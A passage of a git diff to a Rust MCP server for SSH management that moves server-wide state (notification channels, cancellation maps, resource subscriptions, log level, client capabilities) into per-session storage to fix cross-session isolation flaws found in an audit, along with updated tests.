.as_ref() .and_then(|m| m.progress_token.clone()), + session, ) .await; @@ -1366,8 +1539,8 @@ impl McpServer { arguments: Option, task_request: super::protocol::TaskRequest, id: Option, - notification_tx: Option>, progress_token: Option, + session: Option<&SessionContext>, ) -> JsonRpcResponse { // Get the handler first to validate the tool exists let Some(handler) = self.registry.get(&tool_name) else { @@ -1393,34 +1566,28 @@ impl McpServer { ); }; - // Clone dependencies for the background worker + // Clone dependencies for the background worker. let task_store = Arc::clone(&self.task_store); - // Prefer the per-session tx for the task-completion notification - // so it reaches the originating daemon client; fall back to the - // legacy global slot for code paths that don't have a session. - let task_notification_tx = notification_tx.clone(); - let global_notification_tx = Arc::clone(&self.notification_tx); + // Per-session tx ONLY (FIND-034 audit 2026-05-09): the task + // notification must reach the SAME client that created the task, + // never any other live session. If no session is attached + // (legacy non-MCP code path), the notification is silently + // dropped — same effect as before. + let task_notification_tx = session.map(|s| s.notification_tx.clone()); // SEP-1686: emit `notifications/tasks/status` for the initial // non-existent → working transition. The worker emits the matching // terminal notification on completion/failure/cancellation. - { + if let Some(tx) = task_notification_tx.as_ref() { let msg = WriterMessage::Notification(JsonRpcNotification::task_status(&task_info)); - if let Some(tx) = task_notification_tx.as_ref() { - let _ = tx.try_send(msg); - } else { - let tx_guard = global_notification_tx.read().await; - if let Some(tx) = tx_guard.as_ref() { - let _ = tx.try_send(msg); - } - } + let _ = tx.try_send(msg); } // Propagate the task's cancel_token into the ToolContext so the // handler can do clean shutdown (e.g. evicting the SSH connection // from the pool) when the task is cancelled via `tasks/cancel`. let ctx = self - .create_tool_context(Some(cancel_token.clone()), notification_tx, progress_token) + .create_tool_context(Some(cancel_token.clone()), progress_token, session) .await; // Spawn the background worker @@ -1457,19 +1624,13 @@ impl McpServer { } }; - // Send status notification (best-effort). Prefer the - // per-session tx so the message reaches the originating - // client. - if let Some(info) = info { + // Send status notification (best-effort) on the per-session + // tx so it reaches the originating client only. + if let Some(info) = info + && let Some(tx) = task_notification_tx.as_ref() + { let msg = WriterMessage::Notification(JsonRpcNotification::task_status(&info)); - if let Some(tx) = task_notification_tx.as_ref() { - let _ = tx.try_send(msg); - } else { - let tx_guard = global_notification_tx.read().await; - if let Some(tx) = tx_guard.as_ref() { - let _ = tx.try_send(msg); - } - } + let _ = tx.try_send(msg); } }); @@ -1602,10 +1763,19 @@ impl McpServer { JsonRpcResponse::success_or_serialize_error(id, &json!({ "resourceTemplates": templates })) } + /// Subscribe to resource notifications. + /// + /// FIND-036 (audit 2026-05-09): subscriptions are now per-session. + /// The previous server-wide `HashMap>` keyed on + /// URI alone leaked sub-ids across clients — two clients subscribing + /// to the same URI shared the Vec, and one client's `unsubscribe` + /// could remove the other's entries. Each session now has its own + /// map, so there is no cross-session interference. async fn handle_resource_subscribe( &self, id: Option, params: Option, + session: Option<&SessionContext>, ) -> JsonRpcResponse { let uri = params .as_ref() @@ -1615,9 +1785,18 @@ impl McpServer { if uri.is_empty() { return JsonRpcResponse::error(id, JsonRpcError::invalid_params("uri is required")); } + let Some(session) = session else { + // Without a session there's no per-session subscription map + // to write into. Subscriptions are only meaningful in a live + // session anyway. + return JsonRpcResponse::error( + id, + JsonRpcError::invalid_request("resources/subscribe requires an active MCP session"), + ); + }; let sub_id = uuid::Uuid::new_v4().to_string(); { - let mut subs = self.resource_subscriptions.write().await; + let mut subs = session.resource_subs.write().await; subs.entry(uri.to_string()) .or_default() .push(sub_id.clone()); @@ -1625,18 +1804,24 @@ impl McpServer { JsonRpcResponse::success(id, json!({"subscriptionId": sub_id})) } + /// Unsubscribe from resource notifications. + /// + /// FIND-036 (audit 2026-05-09): operates on this session's map only. async fn handle_resource_unsubscribe( &self, id: Option, params: Option, + session: Option<&SessionContext>, ) -> JsonRpcResponse { let uri = params .as_ref() .and_then(|p| p.get("uri")) .and_then(|v| v.as_str()) .unwrap_or(""); - if !uri.is_empty() { - let mut subs = self.resource_subscriptions.write().await; + if !uri.is_empty() + && let Some(session) = session + { + let mut subs = session.resource_subs.write().await; subs.remove(uri); } JsonRpcResponse::success(id, json!({})) @@ -1648,21 +1833,33 @@ impl McpServer { /// Handle a `notifications/cancelled` notification from the client. /// - /// Looks up the `requestId` in [`Self::active_requests`] and fires the - /// associated `CancellationToken`. Long-running tool handlers see the - /// fired token and bail out cleanly via their `tokio::select!` branch - /// (see [`crate::mcp::standard_tool::StandardToolHandler::execute`]). + /// Looks up the `requestId` in the **session-local** [`ActiveRequests`] + /// map and fires the associated `CancellationToken`. Long-running tool + /// handlers see the fired token and bail out cleanly via their + /// `tokio::select!` branch (see + /// [`crate::mcp::standard_tool::StandardToolHandler::execute`]). + /// + /// FIND-038 (audit 2026-05-09): the previous implementation looked up + /// the request in a server-singleton map, allowing a concurrent client + /// to cancel any other client's in-flight request by guessing or + /// observing the JSON-RPC `id`. The lookup is now scoped to + /// `session_active_requests`, the per-session map allocated in + /// `serve_session()`. /// /// Silently ignores: /// - Notifications with no `requestId` (malformed). - /// - Notifications for unknown request IDs (already completed, or - /// referring to a task's `taskId` which is the wrong field to use — - /// tasks are cancelled via the separate `tasks/cancel` request). + /// - Notifications for unknown request IDs (already completed, the + /// request belongs to a different session, or the caller mistakenly + /// used a task `taskId` — tasks are cancelled via the separate + /// `tasks/cancel` request). /// /// This follows MCP 2025-11-25 spec guidance: /// *"Invalid cancellation notifications SHOULD be ignored by the /// receiver."* - fn handle_cancellation_notification(&self, params: Option<&Value>) { + fn handle_cancellation_notification( + session_active_requests: &ActiveRequests, + params: Option<&Value>, + ) { let Some(request_id_val) = params.and_then(|p| p.get("requestId")) else { debug!("notifications/cancelled with no requestId, ignoring"); return; @@ -1680,7 +1877,7 @@ impl McpServer { .and_then(Value::as_str) .unwrap_or(""); - if self.cancel_request(&request_id) { + if session_active_requests.cancel(&request_id) { info!( request_id = %request_id, reason = %reason, @@ -1907,6 +2104,7 @@ impl McpServer { &self, id: Option, params: Option, + session: Option<&SessionContext>, ) -> JsonRpcResponse { let Some(params) = params else { return JsonRpcResponse::error(id, JsonRpcError::invalid_params("Missing params")); @@ -1922,8 +2120,16 @@ impl McpServer { } }; - self.log_level - .store(level_params.level.severity(), Ordering::Relaxed); + // FIND-035: write to the SESSION's log_level so that + // `notifications/setLevel` from this client cannot mute another + // session's `notifications/message` stream. Falls back to the + // server-wide field for legacy non-session call paths (tests). + let target = if let Some(s) = session { + Arc::clone(&s.log_level) + } else { + Arc::clone(&self.log_level) + }; + target.store(level_params.level.severity(), Ordering::Relaxed); info!(level = ?level_params.level, "MCP log level updated"); JsonRpcResponse::success(id, json!({})) @@ -1941,13 +2147,18 @@ mod tests { use std::collections::HashMap; fn create_test_server() -> McpServer { + // Tests in this module exercise the full handler inventory + // (pagination, group filters, etc.). FIND-024 changed the + // default profile to a minimal 8-group set, so we explicitly + // opt every group in for the test fixture. Production code paths + // continue to use whatever the operator put in `tool_groups`. let config = Config { hosts: HashMap::new(), security: SecurityConfig::default(), limits: LimitsConfig::default(), audit: AuditConfig::default(), sessions: SessionConfig::default(), - tool_groups: ToolGroupsConfig::default(), + tool_groups: crate::mcp::registry::all_enabled_tool_groups_config_for_test(), ssh_config: SshConfigDiscovery::default(), http: HttpTransportConfig::default(), rbac: crate::security::rbac::RbacConfig::default(), @@ -1969,7 +2180,9 @@ mod tests { } }); - let response = server.handle_initialize(Some(json!(1)), Some(params)).await; + let response = server + .handle_initialize(Some(json!(1)), Some(params), None) + .await; assert!(response.error.is_none()); let result = response.result.unwrap(); @@ -1992,7 +2205,9 @@ mod tests { } }); - let response = server.handle_initialize(Some(json!(1)), Some(params)).await; + let response = server + .handle_initialize(Some(json!(1)), Some(params), None) + .await; assert!(response.error.is_none()); let result = response.result.unwrap(); @@ -2012,7 +2227,9 @@ mod tests { } }); - let response = server.handle_initialize(Some(json!(1)), Some(params)).await; + let response = server + .handle_initialize(Some(json!(1)), Some(params), None) + .await; assert!(response.error.is_none()); let result = response.result.unwrap(); @@ -2024,7 +2241,7 @@ mod tests { async fn test_handle_initialize_no_params_uses_default_version() { let server = create_test_server(); - let response = server.handle_initialize(Some(json!(1)), None).await; + let response = server.handle_initialize(Some(json!(1)), None, None).await; assert!(response.error.is_none()); let result = response.result.unwrap(); @@ -2043,7 +2260,9 @@ mod tests { } }); - let response = server.handle_initialize(Some(json!(1)), Some(params)).await; + let response = server + .handle_initialize(Some(json!(1)), Some(params), None) + .await; let result = response.result.unwrap(); assert!(result["serverInfo"]["description"].is_string()); @@ -2056,7 +2275,7 @@ mod tests { let server = create_test_server(); assert!(!server.initialized.load(Ordering::SeqCst)); - server.handle_initialize(Some(json!(1)), None).await; + server.handle_initialize(Some(json!(1)), None, None).await; assert!(server.initialized.load(Ordering::SeqCst)); } @@ -2064,7 +2283,7 @@ mod tests { #[tokio::test] async fn test_handle_initialize_includes_extensions() { let server = create_test_server(); - let response = server.handle_initialize(Some(json!(1)), None).await; + let response = server.handle_initialize(Some(json!(1)), None, None).await; let result = response.result.unwrap(); let caps = &result["capabilities"]; @@ -2172,13 +2391,15 @@ mod tests { #[tokio::test] async fn test_destructive_gate_blocks_when_elicitation_unsupported() { // Enable the gate; client has not advertised elicitation support. + // Use all-enabled tool groups to keep `ssh_cron_remove` registered + // (FIND-024 default profile excludes the `cron` group). let mut config = Config { hosts: HashMap::new(), security: SecurityConfig::default(), limits: LimitsConfig::default(), audit: AuditConfig::default(), sessions: SessionConfig::default(), - tool_groups: ToolGroupsConfig::default(), + tool_groups: crate::mcp::registry::all_enabled_tool_groups_config_for_test(), ssh_config: SshConfigDiscovery::default(), http: HttpTransportConfig::default(), rbac: crate::security::rbac::RbacConfig::default(), @@ -2186,6 +2407,9 @@ mod tests { }; config.security.require_elicitation_on_destructive = true; let (server, _task) = McpServer::new(config); + let (tx, _rx) = mpsc::channel::(8); + let session_ctx = SessionContext::new(tx); + // session_ctx.caps.supports_elicitation() defaults to false. // ssh_cron_remove is annotated destructive let params = json!({ @@ -2193,7 +2417,7 @@ mod tests { "arguments": {"host": "prod", "name": "backup"} }); let response = server - .handle_tools_call(Some(json!(1)), Some(params), None, None) + .handle_tools_call(Some(json!(1)), Some(params), None, Some(&session_ctx)) .await; assert!(response.error.is_none()); @@ -2286,24 +2510,29 @@ mod tests { } #[tokio::test] - async fn test_destructive_gate_disabled_by_default() { - // Default config: require_elicitation_on_destructive = false. - // A destructive tool call should not be blocked by the gate - // (it will still fail for other reasons, e.g. unknown host), - // but the error must not be the elicitation-refusal error. + async fn test_destructive_gate_enabled_by_default() { + // FIND-022: default config now sets + // `require_elicitation_on_destructive = true` (security-first). + // A destructive tool call from a session whose client did NOT + // advertise elicitation MUST be rejected by the gate before + // execution. let server = create_test_server(); + let (tx, _rx) = mpsc::channel::(8); + let session_ctx = SessionContext::new(tx); + // session_ctx.caps.supports_elicitation() defaults to false — + // the gate should refuse. let params = json!({ "name": "ssh_cron_remove", "arguments": {"host": "nonexistent", "name": "x"} }); let response = server - .handle_tools_call(Some(json!(1)), Some(params), None, None) + .handle_tools_call(Some(json!(1)), Some(params), None, Some(&session_ctx)) .await; let result = response.result.unwrap(); let text = result["content"][0]["text"].as_str().unwrap_or_default(); assert!( - !text.contains("does not support elicitation"), - "gate fired with feature disabled: {text}" + text.contains("does not support elicitation"), + "gate must fire by default (FIND-022): {text}" ); } @@ -2357,7 +2586,8 @@ mod tests { error: None, }; - let routed = server.route_incoming_message(message, &tx).await; + let session_ctx = SessionContext::new(tx); + let routed = server.route_incoming_message(message, &session_ctx).await; assert!(routed.is_none(), "notification must not be dispatched"); assert!( @@ -2376,10 +2606,9 @@ mod tests { // drive `route_incoming_message` in a background task and just verify // the outbound `roots/list` shows up on tx. let server = Arc::new(create_test_server()); - server - .client_supports_roots - .store(true, std::sync::atomic::Ordering::Relaxed); let (tx, mut rx) = mpsc::channel::(8); + let session_ctx = SessionContext::new(tx); + session_ctx.caps.set_supports_roots(true); let message = super::super::protocol::JsonRpcMessage { jsonrpc: "2.0".to_string(), id: None, @@ -2390,8 +2619,12 @@ mod tests { }; let server_bg = Arc::clone(&server); - let route_handle = - tokio::spawn(async move { server_bg.route_incoming_message(message, &tx).await }); + let session_ctx_bg = session_ctx.clone(); + let route_handle = tokio::spawn(async move { + server_bg + .route_incoming_message(message, &session_ctx_bg) + .await + }); let sent = tokio::time::timeout(std::time::Duration::from_secs(2), rx.recv()) .await @@ -2536,7 +2769,9 @@ mod tests { } }); - let response = server.handle_initialize(Some(json!(1)), Some(params)).await; + let response = server + .handle_initialize(Some(json!(1)), Some(params), None) + .await; assert!(response.error.is_none()); let result = response.result.unwrap(); @@ -2548,7 +2783,7 @@ mod tests { #[tokio::test] async fn test_initialize_with_null_id() { let server = create_test_server(); - let response = server.handle_initialize(None, None).await; + let response = server.handle_initialize(None, None, None).await; assert!(response.error.is_none()); assert!(response.id.is_none()); @@ -2558,7 +2793,7 @@ mod tests { async fn test_initialize_with_string_id() { let server = create_test_server(); let response = server - .handle_initialize(Some(json!("request-1")), None) + .handle_initialize(Some(json!("request-1")), None, None) .await; assert!(response.error.is_none()); @@ -2568,7 +2803,7 @@ mod tests { #[tokio::test] async fn test_initialize_includes_resources_capability() { let server = create_test_server(); - let response = server.handle_initialize(Some(json!(1)), None).await; + let response = server.handle_initialize(Some(json!(1)), None, None).await; assert!(response.error.is_none()); let result = response.result.unwrap(); @@ -2579,8 +2814,8 @@ mod tests { async fn test_initialize_multiple_times() { let server = create_test_server(); - let response1 = server.handle_initialize(Some(json!(1)), None).await; - let response2 = server.handle_initialize(Some(json!(2)), None).await; + let response1 = server.handle_initialize(Some(json!(1)), None, None).await; + let response2 = server.handle_initialize(Some(json!(2)), None, None).await; // Both should succeed (no state prevents re-initialization) assert!(response1.error.is_none()); @@ -2595,7 +2830,9 @@ mod tests { "completely": "wrong" }); - let response = server.handle_initialize(Some(json!(1)), Some(params)).await; + let response = server + .handle_initialize(Some(json!(1)), Some(params), None) + .await; // Should still succeed (params are optional/best-effort) assert!(response.error.is_none()); @@ -2847,7 +3084,7 @@ mod tests { assert!(!server.initialized.load(std::sync::atomic::Ordering::SeqCst)); // After initialize call - server.handle_initialize(Some(json!(1)), None).await; + server.handle_initialize(Some(json!(1)), None, None).await; // Should be initialized assert!(server.initialized.load(std::sync::atomic::Ordering::SeqCst)); @@ -2901,7 +3138,9 @@ mod tests { } }); - let response = server.handle_initialize(Some(json!(1)), Some(params)).await; + let response = server + .handle_initialize(Some(json!(1)), Some(params), None) + .await; let result = response.result.unwrap(); assert!(result["capabilities"]["tasks"].is_object()); @@ -2974,6 +3213,7 @@ mod tests { // the task lifecycle without polling. let server = create_test_server(); let (tx, mut rx) = mpsc::channel::(8); + let session_ctx = SessionContext::new(tx); let params = json!({ "name": "ssh_status", "arguments": {}, @@ -2981,7 +3221,7 @@ mod tests { }); let response = server - .handle_tools_call(Some(json!(1)), Some(params), None, Some(tx)) + .handle_tools_call(Some(json!(1)), Some(params), None, Some(&session_ctx)) .await; assert!(response.error.is_none()); @@ -3502,24 +3742,32 @@ mod tests { #[tokio::test] async fn test_resource_subscribe_valid() { let server = create_test_server(); + let (tx, _rx) = mpsc::channel::(8); + let session_ctx = SessionContext::new(tx); let params = json!({ "uri": "health://server" }); let response = server - .handle_resource_subscribe(Some(json!(1)), Some(params)) + .handle_resource_subscribe(Some(json!(1)), Some(params), Some(&session_ctx)) .await; assert!(response.error.is_none()); let result = response.result.unwrap(); assert!(result["subscriptionId"].is_string()); + // The subscription must land in THIS session's per-session map + // (FIND-036) — verify it's there. + let subs = session_ctx.resource_subs.read().await; + assert!(subs.contains_key("health://server")); } #[tokio::test] async fn test_resource_subscribe_missing_uri() { let server = create_test_server(); + let (tx, _rx) = mpsc::channel::(8); + let session_ctx = SessionContext::new(tx); let params = json!({}); let response = server - .handle_resource_subscribe(Some(json!(1)), Some(params)) + .handle_resource_subscribe(Some(json!(1)), Some(params), Some(&session_ctx)) .await; assert!(response.error.is_some()); @@ -3530,19 +3778,37 @@ mod tests { #[tokio::test] async fn test_resource_unsubscribe() { let server = create_test_server(); + let (tx, _rx) = mpsc::channel::(8); + let session_ctx = SessionContext::new(tx); // First subscribe let sub_params = json!({ "uri": "health://server" }); server - .handle_resource_subscribe(Some(json!(1)), Some(sub_params)) + .handle_resource_subscribe(Some(json!(1)), Some(sub_params), Some(&session_ctx)) .await; // Then unsubscribe let unsub_params = json!({ "uri": "health://server" }); let response = server - .handle_resource_unsubscribe(Some(json!(2)), Some(unsub_params)) + .handle_resource_unsubscribe(Some(json!(2)), Some(unsub_params), Some(&session_ctx)) .await; assert!(response.error.is_none()); + // Map must now be empty for that URI (FIND-036). + let subs = session_ctx.resource_subs.read().await; + assert!(!subs.contains_key("health://server")); + } + + #[tokio::test] + async fn test_resource_subscribe_without_session_rejected() { + // FIND-036: subscription is per-session and meaningless without + // a live session. Calls from non-MCP code paths must be refused + // rather than silently forced through a non-existent global map. + let server = create_test_server(); + let params = json!({ "uri": "health://server" }); + let response = server + .handle_resource_subscribe(Some(json!(1)), Some(params), None) + .await; + assert!(response.error.is_some()); } // ============== Completions Tests ============== @@ -3617,7 +3883,7 @@ mod tests { #[test] fn test_logging_set_level_missing_params() { let server = create_test_server(); - let response = server.handle_logging_set_level(Some(json!(1)), None); + let response = server.handle_logging_set_level(Some(json!(1)), None, None); assert!(response.error.is_some()); assert_eq!(response.error.unwrap().code, -32602); @@ -3627,7 +3893,7 @@ mod tests { fn test_logging_set_level_invalid_params() { let server = create_test_server(); let params = json!({ "level": "nonexistent" }); - let response = server.handle_logging_set_level(Some(json!(1)), Some(params)); + let response = server.handle_logging_set_level(Some(json!(1)), Some(params), None); assert!(response.error.is_some()); assert_eq!(response.error.unwrap().code, -32602); @@ -3637,7 +3903,7 @@ mod tests { fn test_logging_set_level_debug() { let server = create_test_server(); let params = json!({ "level": "debug" }); - let response = server.handle_logging_set_level(Some(json!(1)), Some(params)); + let response = server.handle_logging_set_level(Some(json!(1)), Some(params), None); assert!(response.error.is_none()); assert_eq!(server.log_level.load(Ordering::Relaxed), 0); // debug = 0 @@ -3647,7 +3913,7 @@ mod tests { fn test_logging_set_level_error() { let server = create_test_server(); let params = json!({ "level": "error" }); - let response = server.handle_logging_set_level(Some(json!(1)), Some(params)); + let response = server.handle_logging_set_level(Some(json!(1)), Some(params), None); assert!(response.error.is_none()); assert_eq!(server.log_level.load(Ordering::Relaxed), 4); // error = 4 @@ -3808,6 +4074,10 @@ mod tests { #[tokio::test] async fn test_handle_request_resources_subscribe_dispatch() { + // FIND-036 (audit 2026-05-09): `resources/subscribe` is a + // per-session operation. Calling it through the legacy + // session-less `handle_request` path now produces an error + // rather than silently writing to a non-existent shared map. let server = create_test_server(); let request = JsonRpcRequest { jsonrpc: "2.0".to_string(), @@ -3818,7 +4088,10 @@ mod tests { let response = server.handle_request(request).await; - assert!(response.error.is_none()); + assert!( + response.error.is_some(), + "session-less subscribe must be refused (FIND-036)" + ); } #[tokio::test] @@ -3879,44 +4152,41 @@ mod tests { #[test] fn test_active_requests_starts_empty() { - let server = create_test_server(); - let map = server.active_requests.lock().unwrap(); - assert!(map.is_empty()); + let active = ActiveRequests::new(); + assert_eq!(active.len(), 0); } #[test] fn test_register_request_stores_token_in_map() { - let server = create_test_server(); - let token = server.register_request("req-1".to_string()); + let active = ActiveRequests::new(); + let token = active.register("req-1".to_string()); assert!(!token.is_cancelled(), "fresh token must not be cancelled"); - let map = server.active_requests.lock().unwrap(); - assert_eq!(map.len(), 1); - assert!(map.contains_key("req-1")); + assert_eq!(active.len(), 1); + assert!(active.contains("req-1")); } #[test] fn test_unregister_request_removes_from_map() { - let server = create_test_server(); - let _ = server.register_request("req-2".to_string()); - server.unregister_request("req-2"); - let map = server.active_requests.lock().unwrap(); - assert!(map.is_empty()); + let active = ActiveRequests::new(); + let _ = active.register("req-2".to_string()); + active.unregister("req-2"); + assert_eq!(active.len(), 0); } #[test] fn test_unregister_unknown_request_is_noop() { - let server = create_test_server(); + let active = ActiveRequests::new(); // Must not panic when the id is not present. - server.unregister_request("never-existed"); + active.unregister("never-existed"); } #[test] fn test_cancel_request_fires_token_and_returns_true() { - let server = create_test_server(); - let token = server.register_request("req-3".to_string()); + let active = ActiveRequests::new(); + let token = active.register("req-3".to_string()); - let cancelled = server.cancel_request("req-3"); + let cancelled = active.cancel("req-3"); assert!(cancelled); assert!( @@ -3924,25 +4194,56 @@ mod tests { "token must be cancelled after cancel_request" ); // Map entry should be removed as part of cancel. - let map = server.active_requests.lock().unwrap(); - assert!(map.is_empty()); + assert_eq!(active.len(), 0); } #[test] fn test_cancel_unknown_request_returns_false() { - let server = create_test_server(); - assert!(!server.cancel_request("unknown")); + let active = ActiveRequests::new(); + assert!(!active.cancel("unknown")); } #[test] fn test_cancel_request_removes_entry_to_prevent_double_cancel() { - let server = create_test_server(); - let _ = server.register_request("req-4".to_string()); + let active = ActiveRequests::new(); + let _ = active.register("req-4".to_string()); // First cancel fires and removes. - assert!(server.cancel_request("req-4")); + assert!(active.cancel("req-4")); // Second cancel finds nothing. - assert!(!server.cancel_request("req-4")); + assert!(!active.cancel("req-4")); + } + + /// FIND-038: a cancel notification arriving on session B must NOT + /// touch session A's in-flight requests, even if it carries A's id. + #[test] + fn test_cancel_does_not_cross_sessions() { + let session_a = ActiveRequests::new(); + let session_b = ActiveRequests::new(); + + // Session A registers an in-flight request id "42". + let token_a = session_a.register("42".to_string()); + + // Session B receives notifications/cancelled { requestId: "42" }. + // The handler runs against B's local map only. + McpServer::handle_cancellation_notification( + &session_b, + Some(&json!({ "requestId": "42", "reason": "cross-session attack" })), + ); + + assert!( + !token_a.is_cancelled(), + "session B must not be able to cancel session A's request" + ); + assert!( + session_a.contains("42"), + "session A's map must still contain its request" + ); + assert_eq!( + session_b.len(), + 0, + "session B's map remains empty (no matching id locally)" + ); } /// End-to-end: verifies that `handle_request_with_cancel` propagates @@ -3995,45 +4296,45 @@ mod tests { #[test] fn test_handle_cancellation_notification_fires_token_for_known_id() { - let server = create_test_server(); - let token = server.register_request("req-42".to_string()); + let active = ActiveRequests::new(); + let token = active.register("req-42".to_string()); assert!(!token.is_cancelled()); let params = json!({ "requestId": "req-42", "reason": "user abort" }); - server.handle_cancellation_notification(Some(¶ms)); + McpServer::handle_cancellation_notification(&active, Some(¶ms)); assert!(token.is_cancelled(), "token must fire after notification"); } #[test] fn test_handle_cancellation_notification_ignores_unknown_id() { - let server = create_test_server(); + let active = ActiveRequests::new(); // No panic, no observable side effect. let params = json!({ "requestId": "never-registered" }); - server.handle_cancellation_notification(Some(¶ms)); + McpServer::handle_cancellation_notification(&active, Some(¶ms)); } #[test] fn test_handle_cancellation_notification_ignores_missing_request_id() { - let server = create_test_server(); + let active = ActiveRequests::new(); // Malformed notification (no requestId) must be silently ignored // per MCP spec. let params = json!({ "reason": "nothing specific" }); - server.handle_cancellation_notification(Some(¶ms)); + McpServer::handle_cancellation_notification(&active, Some(¶ms)); } #[test] fn test_handle_cancellation_notification_accepts_numeric_request_id() { // JSON-RPC allows numeric IDs; the normalization to String must - // match what register_request stores for the raw ::Number case. - let server = create_test_server(); + // match what register stores for the raw ::Number case. + let active = ActiveRequests::new(); // The spawn path in run() uses `other.to_string()` for non-string // ids, which yields "7" for Value::Number(7). Test that the // notification handler applies the same normalization. - let token = server.register_request("7".to_string()); + let token = active.register("7".to_string()); let params = json!({ "requestId": 7 }); - server.handle_cancellation_notification(Some(¶ms)); + McpServer::handle_cancellation_notification(&active, Some(¶ms)); assert!(token.is_cancelled()); } diff --git a/src/mcp/session_capabilities.rs b/src/mcp/session_capabilities.rs new file mode 100644 index 00000000..620ad1bc --- /dev/null +++ b/src/mcp/session_capabilities.rs @@ -0,0 +1,46 @@ +//! Per-session client capability flags. +//! +//! Replaces the previous server-wide `AtomicBool` fields that leaked +//! capability advertisements across clients sharing the same daemon — +//! see Vuln 9 in the 2026-05-09 audit. + +use std::sync::atomic::{AtomicBool, Ordering}; + +/// Capabilities advertised by ONE client during its `initialize` request. +#[derive(Debug, Default)] +#[allow(clippy::struct_field_names)] +pub struct SessionCapabilities { + supports_elicitation: AtomicBool, + supports_sampling: AtomicBool, + supports_roots: AtomicBool, +} + +impl SessionCapabilities { + #[must_use] + pub fn new() -> Self { + Self::default() + } + + pub fn set_supports_elicitation(&self, v: bool) { + self.supports_elicitation.store(v, Ordering::Relaxed); + } + pub fn set_supports_sampling(&self, v: bool) { + self.supports_sampling.store(v, Ordering::Relaxed); + } + pub fn set_supports_roots(&self, v: bool) { + self.supports_roots.store(v, Ordering::Relaxed); + } + + #[must_use] + pub fn supports_elicitation(&self) -> bool { + self.supports_elicitation.load(Ordering::Relaxed) + } + #[must_use] + pub fn supports_sampling(&self) -> bool { + self.supports_sampling.load(Ordering::Relaxed) + } + #[must_use] + pub fn supports_roots(&self) -> bool { + self.supports_roots.load(Ordering::Relaxed) + } +} diff --git a/src/mcp/session_context.rs b/src/mcp/session_context.rs new file mode 100644 index 00000000..c4f0f803 --- /dev/null +++ b/src/mcp/session_context.rs @@ -0,0 +1,184 @@ +//! Per-session bundled state. +//! +//! Audit 2026-05-09 (FIND-033/034/036/037) moved four fields off the +//! shared `McpServer` and into per-session storage allocated in +//! `serve_session()`. Together with the prior fixes from Vuln 8, Vuln 9, +//! and FIND-038, that adds up to seven Arc/handle parameters threaded +//! through `route_incoming_message → handle_request_with_cancel → +//! handle_tools_call → create_tool_context`. To avoid the parameter +//! explosion (and per the FIND-038 quality review's standing +//! recommendation), this module bundles them into a single +//! [`SessionContext`]. +//! +//! Lifetime: a fresh [`SessionContext`] is allocated at the top of +//! `McpServer::serve_session()` and shared by clone (cheap — every +//! field is `Arc`-wrapped) into spawned per-request tasks. Each session +//! owns an independent bundle, so cross-session leakage is impossible +//! by construction. + +use std::collections::HashMap; +use std::sync::Arc; +use std::sync::atomic::AtomicU8; + +use tokio::sync::{RwLock, mpsc}; + +use super::pending_requests::PendingRequests; +use super::protocol::{LogLevel, RootEntry, WriterMessage}; +use super::session_capabilities::SessionCapabilities; + +/// All per-session state bundled into one cloneable handle. +/// +/// Every field is an `Arc`/handle so `Clone` is cheap. Spawned per-request +/// tasks clone the whole bundle to avoid threading 7+ individual +/// parameters through the dispatch chain. +#[derive(Clone)] +pub struct SessionContext { + /// Per-session pending-requests map (Vuln 8). + pub pending: Arc, + /// Per-session client capability flags (Vuln 9). + pub caps: Arc, + /// Per-session active-requests map for MCP cancellation (FIND-038). + pub active_requests: super::server::ActiveRequests, + /// Per-session writer channel for server-initiated messages + /// (notifications, requests). FIND-034. + pub notification_tx: mpsc::Sender, + /// Per-session runtime override for `max_output_chars`. Written by + /// `handle_initialize` based on this client's `client_overrides` + /// profile and read by `create_tool_context`. FIND-033. + pub runtime_max_output: Arc>>, + /// Per-session resource subscription map (URI -> subscription IDs). + /// FIND-036. + pub resource_subs: Arc>>>, + /// Per-session client-declared workspace roots. Written by + /// `fetch_roots` after `notifications/initialized`. FIND-037. + pub roots: Arc>>, + /// Per-session log-level threshold for `notifications/message`. + /// Updated by `notifications/setLevel` from THIS session, read by + /// the per-session `McpLogger`. FIND-035: previously a global + /// `Arc` on `McpServer`, so client B's setLevel could + /// mute client A's notifications. + pub log_level: Arc, +} + +impl SessionContext { + /// Allocate a fresh per-session bundle, given the writer channel + /// returned by `serve_session()`'s `mpsc::channel`. + #[must_use] + pub fn new(notification_tx: mpsc::Sender) -> Self { + Self { + pending: Arc::new(PendingRequests::new()), + caps: Arc::new(SessionCapabilities::new()), + active_requests: super::server::ActiveRequests::new(), + notification_tx, + runtime_max_output: Arc::new(RwLock::new(None)), + resource_subs: Arc::new(RwLock::new(HashMap::new())), + roots: Arc::new(RwLock::new(Vec::new())), + log_level: Arc::new(AtomicU8::new(LogLevel::Warning.severity())), + } + } +} + +/// Server-wide registry of live session writer channels for **fanout** +/// (broadcast) notifications. +/// +/// FIND-034 (audit 2026-05-09): the previous topology had a single +/// last-writer-wins `notification_tx` slot on `McpServer`. The config +/// watcher (and any other server-wide event source) used that slot to +/// emit `notifications/tools/list_changed` and +/// `notifications/resources/list_changed`, so the broadcast routed to +/// only ONE session — whichever connected most recently. +/// +/// The fix splits the topology in two: +/// - **Per-session direct sender** lives on [`SessionContext::notification_tx`] +/// and is used for messages addressed to one specific client (progress, +/// elicitation, sampling, per-session logging). +/// - **Server-wide fanout registry** ([`NotificationFanout`]) tracks every +/// live session's tx and is used for broadcasts that legitimately go to +/// ALL connected clients (config-reload `list_changed` events). +/// +/// `serve_session()` registers its tx on entry and removes it on exit. +/// `Drop` of `FanoutGuard` enforces removal even when a session task +/// panics so dead senders never accumulate. +#[derive(Default, Clone)] +pub struct NotificationFanout { + senders: Arc>>>, +} + +impl NotificationFanout { + #[must_use] + pub fn new() -> Self { + Self::default() + } + + /// Register a session's tx. The returned guard removes the entry + /// from the fanout when dropped (session ends or panics). Tolerates + /// a poisoned mutex silently — a stale entry is preferable to a + /// crash on the dispatch path. + #[must_use] + pub fn register(&self, tx: mpsc::Sender) -> FanoutGuard { + if let Ok(mut v) = self.senders.lock() { + v.push(tx.clone()); + } + FanoutGuard { + owner: Arc::clone(&self.senders), + tx, + } + } + + /// Best-effort fanout: send `msg` to every live session. + /// + /// Uses `try_send` so a slow consumer never blocks the broadcaster; + /// dropped messages on a full per-session buffer are acceptable + /// because list-changed notifications are state-derived and the + /// client refreshes on demand. Channel-closed errors prune the + /// dead sender from the registry. + /// + /// `msg` is taken by reference and `clone()`d once per live + /// session — `WriterMessage` is `Clone` specifically to support + /// this fanout topology. + pub fn broadcast(&self, msg: &WriterMessage) { + let snapshot: Vec> = match self.senders.lock() { + Ok(v) => v.clone(), + Err(_) => return, + }; + let mut 